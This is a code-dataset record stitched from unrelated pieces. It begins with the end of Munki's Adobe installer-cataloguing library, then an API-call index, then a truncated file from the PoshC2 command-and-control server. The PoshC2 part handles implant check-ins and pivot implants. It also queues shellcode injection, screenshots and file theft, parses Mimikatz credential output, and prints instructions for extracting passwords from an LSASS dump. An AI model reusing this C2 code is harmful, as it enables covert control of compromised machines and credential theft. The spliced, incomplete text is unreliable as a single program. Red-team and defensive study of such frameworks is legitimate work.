cataloginfo['name'] = cataloginfo['display_name'].replace(
' ', '')
cataloginfo['uninstallable'] = True
cataloginfo['uninstall_method'] = "AdobeCS5AAMEEPackage"
cataloginfo['installer_type'] = "AdobeCS5AAMEEPackage"
cataloginfo['minimum_os_version'] = "10.5.0"
cataloginfo['adobe_install_info'] = get_adobe_install_info(
installdir=dirpath)
mediasignature = cataloginfo['adobe_install_info'].get(
"media_signature")
mediasignatures = [mediasignature]
# Determine whether we have HD media as well in this installer
hd_metadata_dirs = [
product['TargetFolderName']
for product in option_xml_info['products']
if product.get('hd_installer')]
hd_app_infos = []
for sap_code in hd_metadata_dirs:
hd_app_info = get_hd_installer_info(
os.path.join(dirpath, 'HD'), sap_code)
hd_app_infos.append(hd_app_info)
# 'installs' array will be populated if we have either RIBS
# or HD installers, which may be mixed together in one
# CCP package.
# Acrobat Pro DC doesn't currently generate any useful installs
# info if it's part of a CCP package.
installs = []
# media signatures are used for RIBS (CS5 to CC mid-2015)
if mediasignatures:
# make a default <key>installs</key> array
uninstalldir = "/Library/Application Support/Adobe/Uninstall"
for mediasignature in mediasignatures:
signaturefile = mediasignature + ".db"
filepath = os.path.join(uninstalldir, signaturefile)
installitem = {}
installitem['path'] = filepath
installitem['type'] = 'file'
installs.append(installitem)
# Custom installs items for HD installers seem to need only HDMedias
# from optionXML.xml with a MediaType of 'Product' and their
# 'core' packages (e.g. language packs are 'non-core')
if hd_app_infos:
if 'payloads' not in cataloginfo:
cataloginfo['payloads'] = []
cataloginfo['payloads'].extend(hd_app_infos)
# Calculate installed_size by counting packages in payloads
# in these indexed HD medias. installed_size may exist already
# if this package contained RIBS payloads, so try reading it
# and default to 0. This will typically include several very
# small packages (language or regional recommended settings)
# which would not actually get installed. These seem to be
# no larger than a few MB, so in practice it increases the
# 'installed_size' value by only ~1%.
installed_size = cataloginfo.get('installed_size', 0)
for hd_payload in hd_app_infos:
for package in hd_payload['Packages']:
# Generally, all app installs will include 1-3 'core'
# packages and then additional language/settings/color
# packages which are regional or language-specific.
# If we filter this by including both unconditional
# installs and those which are language/region specific,
# we get a rough approximation of the total size of
# supplemental packages, as their equivalents for other
# languages are very close to the same size. We also
# get one included language package which would be the
# case for any install.
#
# Because InDesign CC 2017 is not like any other package
# and contains a 'Condition' key but as an empty
# string, we explicitly test this case as well.
if ('Condition' not in list(package.keys()) or
package.get('Condition') == '' or
'[installLanguage]==en_US' in
package.get('Condition', '')):
installed_size += int(package.get(
'ExtractSize', 0) / 1024)
# We get much closer to Adobe's "HDSetup" calculated
# install space requirement if we include both the
# DownloadSize and ExtractSize data
# (DownloadSize is just the zip file size)
installed_size += int(package.get(
'DownloadSize', 0) / 1024)
# Add another 300MB for the CC app and plumbing in case they've
# never been installed on the system
installed_size += 307200
cataloginfo['installed_size'] = installed_size
uninstalldir = (
'/Library/Application Support/Adobe/Installers/uninstallXml'
)
product_saps = [
prod['SAPCode'] for
prod in option_xml_info['products']
if prod.get('MediaType') == 'Product'
]
product_app_infos = [app for app in hd_app_infos
if app['SAPCode'] in product_saps]
# if we had only a single HD and no legacy apps, set a sane
# version and display_name derived from the app's metadata
if (len(product_app_infos) == 1) and not mediasignatures:
cataloginfo.update({
'display_name': product_app_infos[0]['Name'],
'version': product_app_infos[0]['ProductVersion'],
})
for app_info in product_app_infos:
for pkg in app_info['Packages']:
# Don't assume 'Type' key always exists. At least the
#'AdobeIllustrator20-Settings'
# package doesn't have this key set.
if pkg.get('Type') == 'core':
# We can't use 'ProductVersion' from
# Application.json for the part following the
# SAPCode, because it's usually too specific and
# won't match the "short" product version.
# We can take 'prodVersion' from the optionXML.xml
# instead.
# We filter out any non-HD installers to avoid
# matching up the wrong versions for packages that
# may contain multiple different major versions of
# a given SAPCode
pkg_prod_vers = [
prod['prodVersion']
for prod in option_xml_info['products']
if prod.get('hd_installer') and
prod['SAPCode'] == app_info['SAPCode']][0]
uninstall_file_name = '_'.join([
app_info['SAPCode'],
pkg_prod_vers.replace('.', '_'),
pkg['PackageName'],
pkg['PackageVersion']]) + '.pimx'
filepath = os.path.join(
uninstalldir, uninstall_file_name)
installitem = {}
installitem['path'] = filepath
installitem['type'] = 'file'
installs.append(installitem)
if installs:
cataloginfo['installs'] = installs
return cataloginfo
# Look for Install.app (Bare metal CS5 install)
# we don't handle this type, but we'll report it
# back so makepkginfo can provide an error message
# installapp = find_install_app(mountpoint)
# if installapp:
# cataloginfo = {}
# cataloginfo['installer_type'] = "AdobeCS5Installer"
# return cataloginfo
# Look for AdobePatchInstaller.app (CS5 updater)
installapp = find_adobepatchinstaller_app(mountpoint)
if os.path.exists(installapp):
# this is a CS5 updater disk image
cataloginfo = get_adobe_package_info(mountpoint)
if cataloginfo:
# add some more data
cataloginfo['name'] = cataloginfo['display_name'].replace(' ', '')
cataloginfo['uninstallable'] = False
cataloginfo['installer_type'] = "AdobeCS5PatchInstaller"
if pkgname:
cataloginfo['package_path'] = pkgname
# make some (hopefully functional) installs items from the payloads
installs = []
uninstalldir = "/Library/Application Support/Adobe/Uninstall"
# first look for a payload with a display_name matching the
# overall display_name
for payload in cataloginfo.get('payloads', []):
if (payload.get('display_name', '') ==
cataloginfo['display_name']):
if 'AdobeCode' in payload:
dbfile = payload['AdobeCode'] + ".db"
filepath = os.path.join(uninstalldir, dbfile)
installitem = {}
installitem['path'] = filepath
installitem['type'] = 'file'
installs.append(installitem)
break
if installs == []:
# didn't find a payload with matching name
# just add all of the non-LangPack payloads
# to the installs list.
for payload in cataloginfo.get('payloads', []):
if 'AdobeCode' in payload:
if ("LangPack" in payload.get("display_name") or
"Language Files" in payload.get(
"display_name")):
# skip Language Packs
continue
dbfile = payload['AdobeCode'] + ".db"
filepath = os.path.join(uninstalldir, dbfile)
installitem = {}
installitem['path'] = filepath
installitem['type'] = 'file'
installs.append(installitem)
cataloginfo['installs'] = installs
return cataloginfo
# Look for AdobeUberInstaller items (CS4 install)
pkgroot = os.path.join(mountpoint, pkgname)
adobeinstallxml = os.path.join(pkgroot, "AdobeUberInstaller.xml")
if os.path.exists(adobeinstallxml):
# this is a CS4 Enterprise Deployment package
cataloginfo = get_adobe_package_info(pkgroot)
if cataloginfo:
# add some more data
cataloginfo['name'] = cataloginfo['display_name'].replace(' ', '')
cataloginfo['uninstallable'] = True
cataloginfo['uninstall_method'] = "AdobeUberUninstaller"
cataloginfo['installer_type'] = "AdobeUberInstaller"
if pkgname:
cataloginfo['package_path'] = pkgname
return cataloginfo
# maybe this is an Adobe update DMG or CS3 installer
# look for Adobe Setup.app
setuppath = find_setup_app(mountpoint)
if setuppath:
cataloginfo = get_adobe_setup_info(mountpoint)
if cataloginfo:
# add some more data
cataloginfo['name'] = cataloginfo['display_name'].replace(' ', '')
cataloginfo['installer_type'] = "AdobeSetup"
if cataloginfo.get('AdobeSetupType') == "ProductInstall":
cataloginfo['uninstallable'] = True
cataloginfo['uninstall_method'] = "AdobeSetup"
else:
cataloginfo['description'] = "Adobe updater"
cataloginfo['uninstallable'] = False
cataloginfo['update_for'] = ["PleaseEditMe-1.0.0.0.0"]
return cataloginfo
# maybe this is an Adobe Acrobat 9 Pro patcher?
acrobatpatcherapp = find_acrobat_patch_app(mountpoint)
if acrobatpatcherapp:
cataloginfo = {}
cataloginfo['installer_type'] = "AdobeAcrobatUpdater"
cataloginfo['uninstallable'] = False
plist = pkgutils.getBundleInfo(acrobatpatcherapp)
cataloginfo['version'] = pkgutils.getVersionString(plist)
cataloginfo['name'] = "AcrobatPro9Update"
cataloginfo['display_name'] = "Adobe Acrobat Pro Update"
cataloginfo['update_for'] = ["AcrobatPro9"]
cataloginfo['RestartAction'] = 'RequireLogout'
cataloginfo['requires'] = []
cataloginfo['installs'] = [
{'CFBundleIdentifier': 'com.adobe.Acrobat.Pro',
'CFBundleName': 'Acrobat',
'CFBundleShortVersionString': cataloginfo['version'],
'path': '/Applications/Adobe Acrobat 9 Pro/Adobe Acrobat Pro.app',
'type': 'application'}
]
return cataloginfo
# didn't find any Adobe installers/updaters we understand
return None
# pylint: enable=invalid-name
if __name__ == '__main__':
print('This is a library of support tools for the Munki Suite.')
| [
"os.path.exists",
"xml.dom.minidom.parse",
"sqlite3.connect",
"os.path.join",
"os.path.isfile",
"os.path.dirname",
"xml.dom.minidom.parseString",
"os.path.isdir",
"os.path.basename",
"os.walk"
] | [((1103, 1119), 'os.walk', 'os.walk', (['dirpath'], {}), '(dirpath)\n', (1110, 1119), False, 'import os\n'), ((1515, 1531), 'os.walk', 'os.walk', (['dirpath'], {}), '(dirpath)\n', (1522, 1531), False, 'import os\n'), ((1953, 1969), 'os.walk', 'os.walk', (['dirpath'], {}), '(dirpath)\n', (1960, 1969), False, 'import os\n'), ((2425, 2441), 'os.walk', 'os.walk', (['dirpath'], {}), '(dirpath)\n', (2432, 2441), False, 'import os\n'), ((2871, 2887), 'os.walk', 'os.walk', (['dirpath'], {}), '(dirpath)\n', (2878, 2887), False, 'import os\n'), ((3632, 3654), 'os.path.isdir', 'os.path.isdir', (['dirpath'], {}), '(dirpath)\n', (3645, 3654), False, 'import os\n'), ((6356, 6376), 'os.walk', 'os.walk', (['installroot'], {}), '(installroot)\n', (6363, 6376), False, 'import os\n'), ((9759, 9810), 'os.path.join', 'os.path.join', (['installroot', '"""AdobeUberInstaller.xml"""'], {}), "(installroot, 'AdobeUberInstaller.xml')\n", (9771, 9810), False, 'import os\n'), ((9818, 9846), 'os.path.exists', 'os.path.exists', (['installerxml'], {}), '(installerxml)\n', (9832, 9846), False, 'import os\n'), ((11917, 11947), 'xml.dom.minidom.parse', 'minidom.parse', (['option_xml_file'], {}), '(option_xml_file)\n', (11930, 11947), False, 'from xml.dom import minidom\n'), ((15704, 15763), 'os.path.join', 'os.path.join', (['hd_payload_root', 'sap_code', '"""Application.json"""'], {}), "(hd_payload_root, sap_code, 'Application.json')\n", (15716, 15763), False, 'import os\n'), ((16818, 16834), 'os.walk', 'os.walk', (['dirpath'], {}), '(dirpath)\n', (16825, 16834), False, 'import os\n'), ((17058, 17097), 'os.path.join', 'os.path.join', (['payloads_dir', '"""Setup.xml"""'], {}), "(payloads_dir, 'Setup.xml')\n", (17070, 17097), False, 'import os\n'), ((17837, 17867), 'xml.dom.minidom.parse', 'minidom.parse', (['option_xml_file'], {}), '(option_xml_file)\n', (17850, 17867), False, 'from xml.dom import minidom\n'), ((18621, 18637), 'os.walk', 'os.walk', (['dirpath'], {}), '(dirpath)\n', (18628, 18637), False, 'import os\n'), ((30122, 30148), 'os.path.exists', 'os.path.exists', (['installapp'], {}), '(installapp)\n', (30136, 30148), False, 'import os\n'), ((32513, 32546), 'os.path.join', 'os.path.join', (['mountpoint', 'pkgname'], {}), '(mountpoint, pkgname)\n', (32525, 32546), False, 'import os\n'), ((32569, 32616), 'os.path.join', 'os.path.join', (['pkgroot', '"""AdobeUberInstaller.xml"""'], {}), "(pkgroot, 'AdobeUberInstaller.xml')\n", (32581, 32616), False, 'import os\n'), ((32624, 32655), 'os.path.exists', 'os.path.exists', (['adobeinstallxml'], {}), '(adobeinstallxml)\n', (32638, 32655), False, 'import os\n'), ((8321, 8341), 'os.walk', 'os.walk', (['installroot'], {}), '(installroot)\n', (8328, 8341), False, 'import os\n'), ((9887, 9914), 'xml.dom.minidom.parse', 'minidom.parse', (['installerxml'], {}), '(installerxml)\n', (9900, 9914), False, 'from xml.dom import minidom\n'), ((11361, 11390), 'os.path.basename', 'os.path.basename', (['installroot'], {}), '(installroot)\n', (11377, 11390), False, 'import os\n'), ((17105, 17129), 'os.path.exists', 'os.path.exists', (['setupxml'], {}), '(setupxml)\n', (17119, 17129), False, 'import os\n'), ((17134, 17158), 'os.path.isfile', 'os.path.isfile', (['setupxml'], {}), '(setupxml)\n', (17148, 17158), False, 'import os\n'), ((17198, 17221), 'xml.dom.minidom.parse', 'minidom.parse', (['setupxml'], {}), '(setupxml)\n', (17211, 17221), False, 'from xml.dom import minidom\n'), ((19584, 19625), 'os.path.join', 'os.path.join', (['installdir', '"""optionXML.xml"""'], {}), "(installdir, 'optionXML.xml')\n", (19596, 19625), False, 'import os\n'), ((19637, 19668), 'os.path.exists', 'os.path.exists', (['option_xml_file'], {}), '(option_xml_file)\n', (19651, 19668), False, 'import os\n'), ((20202, 20236), 'os.path.dirname', 'os.path.dirname', (['deploymentmanager'], {}), '(deploymentmanager)\n', (20217, 20236), False, 'import os\n'), ((20263, 20301), 'os.path.join', 'os.path.join', (['dirpath', '"""optionXML.xml"""'], {}), "(dirpath, 'optionXML.xml')\n", (20275, 20301), False, 'import os\n'), ((20342, 20373), 'os.path.exists', 'os.path.exists', (['option_xml_file'], {}), '(option_xml_file)\n', (20356, 20373), False, 'import os\n'), ((1187, 1237), 'os.path.join', 'os.path.join', (['path', '"""Contents"""', '"""MacOS"""', '"""Install"""'], {}), "(path, 'Contents', 'MacOS', 'Install')\n", (1199, 1237), False, 'import os\n'), ((1253, 1279), 'os.path.exists', 'os.path.exists', (['setup_path'], {}), '(setup_path)\n', (1267, 1279), False, 'import os\n'), ((1597, 1645), 'os.path.join', 'os.path.join', (['path', '"""Contents"""', '"""MacOS"""', '"""Setup"""'], {}), "(path, 'Contents', 'MacOS', 'Setup')\n", (1609, 1645), False, 'import os\n'), ((1661, 1687), 'os.path.exists', 'os.path.exists', (['setup_path'], {}), '(setup_path)\n', (1675, 1687), False, 'import os\n'), ((2049, 2111), 'os.path.join', 'os.path.join', (['path', '"""Contents"""', '"""MacOS"""', '"""AdobePatchInstaller"""'], {}), "(path, 'Contents', 'MacOS', 'AdobePatchInstaller')\n", (2061, 2111), False, 'import os\n'), ((2144, 2170), 'os.path.exists', 'os.path.exists', (['setup_path'], {}), '(setup_path)\n', (2158, 2170), False, 'import os\n'), ((2517, 2561), 'os.path.join', 'os.path.join', (['path', '"""AdobeDeploymentManager"""'], {}), "(path, 'AdobeDeploymentManager')\n", (2529, 2561), False, 'import os\n'), ((2577, 2600), 'os.path.exists', 'os.path.exists', (['dm_path'], {}), '(dm_path)\n', (2591, 2600), False, 'import os\n'), ((3002, 3066), 'os.path.join', 'os.path.join', (['path', '"""Contents"""', '"""Resources"""', '"""ApplyOperation.py"""'], {}), "(path, 'Contents', 'Resources', 'ApplyOperation.py')\n", (3014, 3066), False, 'import os\n'), ((3099, 3132), 'os.path.exists', 'os.path.exists', (['patch_script_path'], {}), '(patch_script_path)\n', (3113, 3132), False, 'import os\n'), ((3683, 3719), 'os.path.join', 'os.path.join', (['dirpath', '"""*.proxy.xml"""'], {}), "(dirpath, '*.proxy.xml')\n", (3695, 3719), False, 'import os\n'), ((3800, 3822), 'xml.dom.minidom.parse', 'minidom.parse', (['xmlpath'], {}), '(xmlpath)\n', (3813, 3822), False, 'from xml.dom import minidom\n'), ((3931, 3967), 'os.path.join', 'os.path.join', (['dirpath', '"""Media_db.db"""'], {}), "(dirpath, 'Media_db.db')\n", (3943, 3967), False, 'import os\n'), ((3983, 4006), 'os.path.exists', 'os.path.exists', (['db_path'], {}), '(db_path)\n', (3997, 4006), False, 'import os\n'), ((6503, 6534), 'os.path.join', 'os.path.join', (['path', '"""setup.xml"""'], {}), "(path, 'setup.xml')\n", (6515, 6534), False, 'import os\n'), ((6550, 6574), 'os.path.exists', 'os.path.exists', (['setupxml'], {}), '(setupxml)\n', (6564, 6574), False, 'import os\n'), ((10655, 10697), 'os.path.join', 'os.path.join', (['installroot', '"""optionXML.xml"""'], {}), "(installroot, 'optionXML.xml')\n", (10667, 10697), False, 'import os\n'), ((10713, 10741), 'os.path.exists', 'os.path.exists', (['installerxml'], {}), '(installerxml)\n', (10727, 10741), False, 'import os\n'), ((4031, 4055), 'sqlite3.connect', 'sqlite3.connect', (['db_path'], {}), '(db_path)\n', (4046, 4055), False, 'import sqlite3\n'), ((6598, 6621), 'xml.dom.minidom.parse', 'minidom.parse', (['setupxml'], {}), '(setupxml)\n', (6611, 6621), False, 'from xml.dom import minidom\n'), ((7611, 7635), 'os.path.join', 'os.path.join', (['path', 'item'], {}), '(path, item)\n', (7623, 7635), False, 'import os\n'), ((10765, 10792), 'xml.dom.minidom.parse', 'minidom.parse', (['installerxml'], {}), '(installerxml)\n', (10778, 10792), False, 'from xml.dom import minidom\n'), ((18794, 18821), 'os.path.join', 'os.path.join', (['path', 'subitem'], {}), '(path, subitem)\n', (18806, 18821), False, 'import os\n'), ((18841, 18867), 'os.path.isdir', 'os.path.isdir', (['subitempath'], {}), '(subitempath)\n', (18854, 18867), False, 'import os\n'), ((4400, 4429), 'xml.dom.minidom.parseString', 'minidom.parseString', (['info_xml'], {}), '(info_xml)\n', (4419, 4429), False, 'from xml.dom import minidom\n'), ((22417, 22444), 'os.path.join', 'os.path.join', (['dirpath', '"""HD"""'], {}), "(dirpath, 'HD')\n", (22429, 22444), False, 'import os\n'), ((23209, 23250), 'os.path.join', 'os.path.join', (['uninstalldir', 'signaturefile'], {}), '(uninstalldir, signaturefile)\n', (23221, 23250), False, 'import os\n'), ((8570, 8594), 'os.path.join', 'os.path.join', (['path', 'item'], {}), '(path, item)\n', (8582, 8594), False, 'import os\n'), ((31183, 31217), 'os.path.join', 'os.path.join', (['uninstalldir', 'dbfile'], {}), '(uninstalldir, dbfile)\n', (31195, 31217), False, 'import os\n'), ((32128, 32162), 'os.path.join', 'os.path.join', (['uninstalldir', 'dbfile'], {}), '(uninstalldir, dbfile)\n', (32140, 32162), False, 'import os\n'), ((29247, 29294), 'os.path.join', 'os.path.join', (['uninstalldir', 'uninstall_file_name'], {}), '(uninstalldir, uninstall_file_name)\n', (29259, 29294), False, 'import os\n')] |
import datetime, hashlib, base64, traceback, os, re
import poshc2.server.database.DB as DB
from poshc2.Colours import Colours
from poshc2.server.Config import ModulesDirectory, DownloadsDirectory, ReportsDirectory
from poshc2.server.Implant import Implant
from poshc2.server.Core import decrypt, encrypt, default_response, decrypt_bytes_gzip, number_of_days, process_mimikatz, print_bad
from poshc2.server.Core import load_module, load_module_sharp, encrypt, default_response
from poshc2.server.payloads.Payloads import Payloads
from poshc2.server.PowerStatus import translate_power_status
from poshc2.Utils import randomuri
def newTaskOutput(uriPath, cookieVal, post_data, wsclient=False):
now = datetime.datetime.now()
all_implants = DB.get_implants_all()
if not all_implants:
print_bad("Received post request but no implants in database... has the project been cleaned but you're using the same URLs?")
return
for implant in all_implants:
implantID = implant.ImplantID
RandomURI = implant.RandomURI
Hostname = implant.Hostname
encKey = implant.Key
Domain = implant.Domain
User = implant.User
implant_type = implant.Pivot
if RandomURI in uriPath and cookieVal:
DB.update_implant_lastseen(now.strftime("%Y-%m-%d %H:%M:%S"), RandomURI)
decCookie = decrypt(encKey, cookieVal)
if implant_type == "JXA":
rawoutput = decrypt(encKey, post_data[1500:])
else:
rawoutput = decrypt_bytes_gzip(encKey, post_data[1500:])
if decCookie.startswith("Error"):
print(Colours.RED)
print("The multicmd errored: ")
print(rawoutput)
print(Colours.GREEN)
return
cookieMsg = ""
if "-" in decCookie:
decCookie = decCookie.strip('\x00')
splt = decCookie.split("-")
if not splt[0].isdigit():
print(Colours.RED + "[!] Cookie %s is invalid" % decCookie + Colours.GREEN)
return
else:
taskId = str(int(splt[0]))
cookieMsg = splt[1]
else:
taskId = str(int(decCookie.strip('\x00')))
taskIdStr = "0" * (5 - len(str(taskId))) + str(taskId)
if taskId != "99999":
executedCmd = DB.get_cmd_from_task_id(taskId)
task_owner = DB.get_task_owner(taskId)
else:
print(Colours.END)
timenow = now.strftime("%Y-%m-%d %H:%M:%S")
print(f"Background task against implant {implantID} on host {Domain}\\{User} @ {Hostname} ({timenow}) (output appended to %sbackground-data.txt)" % ReportsDirectory)
print(Colours.GREEN)
print(rawoutput)
miscData = open(("%sbackground-data.txt" % ReportsDirectory), "a+")
miscData.write(rawoutput)
return
print(Colours.GREEN)
if task_owner is not None:
print("Task %s (%s) returned against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, task_owner, implantID, Domain, User, Hostname, now.strftime("%Y-%m-%d %H:%M:%S")))
else:
print("Task %s returned against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, implantID, Domain, User, Hostname, now.strftime("%Y-%m-%d %H:%M:%S")))
try:
outputParsed = re.sub(r'123456(.+?)654321', '', rawoutput)
outputParsed = outputParsed.rstrip()
except Exception:
pass
if cookieMsg is not None and cookieMsg.lower().startswith("pwrstatusmsg"):
translate_power_status(outputParsed, RandomURI)
return
if "loadmodule" in executedCmd and len(outputParsed.split()) == 0:
print("Module loaded successfully")
DB.update_task(taskId, "Module loaded successfully")
elif "pbind-connect " in executedCmd and "PBind-Connected" in outputParsed or "PBind PBind start" in executedCmd and "PBind-Connected" in outputParsed:
outputParsed = re.search("PBind-Connected:.*", outputParsed)
outputParsed = outputParsed[0].replace("PBind-Connected: ", "")
Domain, User, Hostname, Arch, PID, Proxy = str(outputParsed).split(";")
Proxy = Proxy.replace("\x00", "")
if "\\" in User:
User = User[User.index("\\") + 1:]
PivotString = "C# PBind"
if "pbind-command run-exe PBind PBind start" in executedCmd:
PivotString = "C# PBind Pivot"
newImplant = Implant(implantID, PivotString, str(Domain), str(User), str(Hostname), Arch, PID, None)
newImplant.save()
newImplant.display()
newImplant.autoruns()
if "pbind-command run-exe PBind PBind start" in executedCmd:
DB.new_task("pbind-pivot-loadmodule Stage2-Core.exe", "autoruns", RandomURI)
else:
DB.new_task("pbind-loadmodule Stage2-Core.exe", "autoruns", RandomURI)
elif "fcomm-connect " in executedCmd and "FComm-Connected" in outputParsed:
outputParsed = re.search("FComm-Connected:.*", outputParsed)
outputParsed = outputParsed[0].replace("FComm-Connected: ", "")
Domain, User, Hostname, Arch, PID, Proxy = str(outputParsed).split(";")
Proxy = Proxy.replace("\x00", "")
if "\\" in User:
User = User[User.index("\\") + 1:]
newImplant = Implant(implantID, "C# FComm", str(Domain), str(User), str(Hostname), Arch, PID, None)
newImplant.save()
newImplant.display()
newImplant.autoruns()
DB.new_task("fcomm-loadmodule Stage2-Core.exe", "autoruns", RandomURI)
elif executedCmd.lower().startswith("beacon "):
new_sleep = executedCmd.replace('beacon ', '').strip()
DB.update_sleep(new_sleep, RandomURI)
elif "get-screenshot" in executedCmd.lower():
try:
decoded = base64.b64decode(outputParsed)
filename = implant.User + "-" + now.strftime("%m%d%Y%H%M%S_" + randomuri())
output_file = open('%s%s.png' % (DownloadsDirectory, filename), 'wb')
print("Screenshot captured: %s%s.png" % (DownloadsDirectory, filename))
DB.update_task(taskId, "Screenshot captured: %s%s.png" % (DownloadsDirectory, filename))
output_file.write(decoded)
output_file.close()
except Exception:
DB.update_task(taskId, "Screenshot not captured, the screen could be locked or this user does not have access to the screen!")
print("Screenshot not captured, the screen could be locked or this user does not have access to the screen!")
elif (executedCmd.lower().startswith("$shellcode64")) or (executedCmd.lower().startswith("$shellcode64")):
DB.update_task(taskId, "Upload shellcode complete")
print("Upload shellcode complete")
elif (executedCmd.lower().startswith("run-exe core.program core inject-shellcode")) or (executedCmd.lower().startswith("pbind-command run-exe core.program core inject-shellcode")) or (executedCmd.lower().startswith("pbind-pivot-command run-exe core.program core inject-shellcode")):
DB.update_task(taskId, "Upload shellcode complete")
print(outputParsed)
elif "download-file" in executedCmd.lower():
try:
filename = executedCmd.lower().replace("download-files ", "")
filename = filename.replace("download-file ", "")
filename = filename.replace("-source ", "")
filename = filename.replace("..", "")
filename = filename.replace("'", "")
filename = filename.replace('"', "")
filename = filename.replace("\\", "/")
directory, filename = filename.rsplit('/', 1)
filename = filename.rstrip('\x00')
original_filename = filename.strip()
if not original_filename:
directory = directory.rstrip('\x00')
directory = directory.replace("/", "_").replace("\\", "_").strip()
original_filename = directory
try:
if rawoutput.startswith("Error"):
print("Error downloading file: ")
print(rawoutput)
break
chunkNumber = rawoutput[:5]
totalChunks = rawoutput[5:10]
except Exception:
chunkNumber = rawoutput[:5].decode("utf-8")
totalChunks = rawoutput[5:10].decode("utf-8")
if (chunkNumber == "00001") and os.path.isfile('%s%s' % (DownloadsDirectory, filename)):
counter = 1
while(os.path.isfile('%s%s' % (DownloadsDirectory, filename))):
if '.' in filename:
filename = original_filename[:original_filename.rfind('.')] + '-' + str(counter) + original_filename[original_filename.rfind('.'):]
else:
filename = original_filename + '-' + str(counter)
counter += 1
if (chunkNumber != "00001"):
counter = 1
if not os.path.isfile('%s%s' % (DownloadsDirectory, filename)):
print("Error trying to download part of a file to a file that does not exist: %s" % filename)
while(os.path.isfile('%s%s' % (DownloadsDirectory, filename))):
# First find the 'next' file would be downloaded to
if '.' in filename:
filename = original_filename[:original_filename.rfind('.')] + '-' + str(counter) + original_filename[original_filename.rfind('.'):]
else:
filename = original_filename + '-' + str(counter)
counter += 1
if counter != 2:
# Then actually set the filename to this file - 1 unless it's the first one and exists without a counter
if '.' in filename:
filename = original_filename[:original_filename.rfind('.')] + '-' + str(counter - 2) + original_filename[original_filename.rfind('.'):]
else:
filename = original_filename + '-' + str(counter - 2)
else:
filename = original_filename
print("Download file part %s of %s to: %s" % (chunkNumber, totalChunks, filename))
DB.update_task(taskId, "Download file part %s of %s to: %s" % (chunkNumber, totalChunks, filename))
output_file = open('%s%s' % (DownloadsDirectory, filename), 'ab')
try:
output_file.write(rawoutput[10:])
except Exception:
output_file.write(rawoutput[10:].encode("utf-8"))
output_file.close()
except Exception as e:
DB.update_task(taskId, "Error downloading file %s " % e)
print("Error downloading file %s " % e)
traceback.print_exc()
elif "safetydump" in executedCmd.lower():
rawoutput = decrypt_bytes_gzip(encKey, post_data[1500:])
if rawoutput.startswith("[-]") or rawoutput.startswith("ErrorCmd"):
DB.update_task(taskId, rawoutput)
print(rawoutput)
else:
dumpname = "SafetyDump-Task-%s.b64" % taskIdStr
dumppath = "%s%s" % (DownloadsDirectory, dumpname)
open(dumppath, 'w').write(rawoutput)
message = "Dump written to: %s" % dumppath
message = message + "\n The base64 blob needs decoding, e.g. on Windows to use Mimikatz:"
message = message + "\n $filename = '.\\%s'" % dumpname
message = message + "\n $b64 = Get-Content $filename"
message = message + "\n $bytes = [System.Convert]::FromBase64String($b64)"
message = message + "\n [io.file]::WriteAllBytes(((Get-Item -Path \".\\\").FullName) + '\\safetydump.dmp', $bytes)"
message = message + "\n ./mimikatz.exe"
message = message + "\n sekurlsa::minidump safetydump.dmp"
message = message + "\n sekurlsa::logonpasswords"
message = message + "\nOr to just decode on Linux:"
message = message + f"\n base64 -id {dumpname} > dump.bin"
DB.update_task(taskId, message)
print(message)
elif (executedCmd.lower().startswith("run-exe safetykatz") or "invoke-mimikatz" in executedCmd or executedCmd.lower().startswith("pbind-") or executedCmd.lower().startswith("fcomm-command") or executedCmd.lower().startswith("run-dll sharpsploit")) and "logonpasswords" in outputParsed.lower():
print("Parsing Mimikatz Output")
DB.update_task(taskId, outputParsed)
process_mimikatz(outputParsed)
print(Colours.GREEN)
print(outputParsed + Colours.END)
else:
DB.update_task(taskId, outputParsed)
print(Colours.GREEN)
print(outputParsed + Colours.END)
def newTask(path):
all_implants = DB.get_implants_all()
commands = ""
if all_implants:
for i in all_implants:
RandomURI = i.RandomURI
Pivot = i.Pivot
EncKey = i.Key
tasks = DB.get_newtasks(RandomURI)
if RandomURI in path and tasks:
for task in tasks:
command = task[2]
user = task[3]
user_command = command
implant = DB.get_implantbyrandomuri(RandomURI)
implant_type = DB.get_implanttype(RandomURI)
now = datetime.datetime.now()
if (command.lower().startswith("$shellcode64")) or (command.lower().startswith("$shellcode86") or command.lower().startswith("run-exe core.program core inject-shellcode") or command.lower().startswith("run-exe pbind pbind run-exe core.program core inject-shellcode") or command.lower().startswith("pbind-command run-exe core.program core inject-shellcode") or command.lower().startswith("pbind-pivot-command run-exe core.program core inject-shellcode")):
user_command = "Inject Shellcode: %s" % command[command.index("#") + 1:]
command = command[:command.index("#")]
elif (command.lower().startswith("run-jxa ")) or (command.lower().startswith("clipboard-monitor ")) or (command.lower().startswith("cred-popper ")):
user_command = command[:command.index("#")]
command = "run-jxa " + command[command.index("#") + 1:]
elif (command.lower().startswith('upload-file') or command.lower().startswith('pbind-command upload-file') or command.lower().startswith('fcomm-command upload-file')):
PBind = False
FComm = False
if command.lower().startswith('pbind-command upload-file'):
PBind = True
if command.lower().startswith('fcomm-command upload-file'):
FComm = True
upload_args = command \
.replace('pbind-command upload-file', '') \
.replace('fcomm-command upload-file', '') \
.replace('upload-file', '')
upload_file_args_split = upload_args.split()
if len(upload_file_args_split) < 2:
print(Colours.RED)
print("Error parsing upload command: %s" % upload_args)
print(Colours.GREEN)
continue
upload_file = upload_file_args_split[0]
upload_file_destination = upload_file_args_split[1]
upload_args = upload_args.replace(upload_file, '')
upload_args = upload_args.replace(upload_file_destination, '')
with open(upload_file, "rb") as f:
upload_file_bytes = f.read()
if not upload_file_bytes:
print(Colours.RED + f"Error, no bytes read from the upload file, removing task: {upload_file}" + Colours.GREEN)
DB.del_newtasks(str(task[0]))
continue
upload_file_bytes_b64 = base64.b64encode(upload_file_bytes).decode("utf-8")
if implant_type.lower().startswith('c#'):
command = f"upload-file {upload_file_bytes_b64};\"{upload_file_destination}\" {upload_args}"
elif implant_type.lower().startswith('ps'):
command = f"Upload-File -Destination \"{upload_file_destination}\" -Base64 {upload_file_bytes_b64} {upload_args}"
elif implant_type.lower().startswith('py'):
command = f"upload-file \"{upload_file_destination}\":{upload_file_bytes_b64} {upload_args}"
elif implant_type.lower().startswith('jxa'):
command = f"upload-file {upload_file_destination}:{upload_file_bytes_b64} {upload_args}"
else:
print(Colours.RED)
print("Error parsing upload command: %s" % upload_args)
print(Colours.GREEN)
if PBind:
command = f"pbind-command {command}"
if FComm:
command = f"fcomm-command {command}"
filehash = hashlib.md5(base64.b64decode(upload_file_bytes_b64)).hexdigest()
